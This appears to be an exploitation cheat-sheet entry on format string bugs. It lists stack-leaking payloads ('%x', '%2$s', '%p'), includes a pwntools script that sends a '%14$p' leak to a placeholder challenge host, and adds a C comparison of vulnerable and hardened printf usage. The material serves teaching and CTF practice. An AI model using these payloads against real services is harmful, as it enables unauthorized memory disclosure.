killchain-compendium/exploit/binaries/format_string/format_string.md

# Format String

- Read and write values from the stack

## Read

- Input `%x` for every value that should be read from the stack:

```
%x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x
```

- Select a value as a string by its position, e.g. the second value:

```
%2$s
```

- Another way of reading is via `%p`

- ir0stone's pwn-notes contain some useful pwntools scripts, such as this one:

```python
from pwn import *

# Target: either a local binary or a remote service
#p = process('./vuln')
target_ip = '127.0.0.1'  # placeholder, set to the challenge host
p = remote(target_ip, 9006)

# %14$p prints the 14th format argument as a pointer, i.e. one value
# read from the stack; '||||' is filler before the appended address
payload = b'%14$p||||'
payload += p32(0x8048000)  # 32-bit little-endian address appended to the input

p.sendline(payload)
log.info(p.clean())  # print whatever the program sent back, leak included
```
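As an added illustration (not part of this note or of ir0stone's scripts), the C side of what the payloads above rely on: the vulnerable `printf(user)` pattern beside its hardened `printf("%s", user)` form, with a helper that shows only the vulnerable one turns `%x` into leaked register/stack values. Function names and the probe string are my own.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern: untrusted data is used *as* the format string.
 * printf consumes one vararg per directive it meets; none were supplied,
 * so "%x"/"%p" yield whatever sits in the argument slots (registers,
 * then the caller's stack), which is exactly the leak the note describes. */
void echo_vulnerable(char *out, size_t n, const char *user) {
    snprintf(out, n, user); /* gcc -Wformat-security warns on this line */
}

/* Hardened pattern: constant format, the data travels as an argument,
 * so "%x %x" in the input is copied literally and never interpreted. */
void echo_safe(char *out, size_t n, const char *user) {
    snprintf(out, n, "%s", user);
}

/* Helper for the comparison: 1 if the echo routine interpreted the input
 * as directives (output differs from input), 0 if it echoed it verbatim. */
int interprets_input(void (*echo)(char *, size_t, const char *),
                     const char *user) {
    char out[256];
    echo(out, sizeof out, user);
    return strcmp(out, user) != 0;
}

int main(void) {
    const char *probe = "%x %x %x %x"; /* constructed sample input */
    printf("vulnerable interprets directives: %d\n",
           interprets_input(echo_vulnerable, probe));
    printf("hardened   interprets directives: %d\n",
           interprets_input(echo_safe, probe));
    return 0;
}
```

Compiling with `-Wformat -Wformat-security` flags the vulnerable call at build time, and glibc's `_FORTIFY_SOURCE=2` aborts on `%n` when the format string lives in writable memory; neither stops the `%x`/`%p` reads, which only the constant-format fix removes.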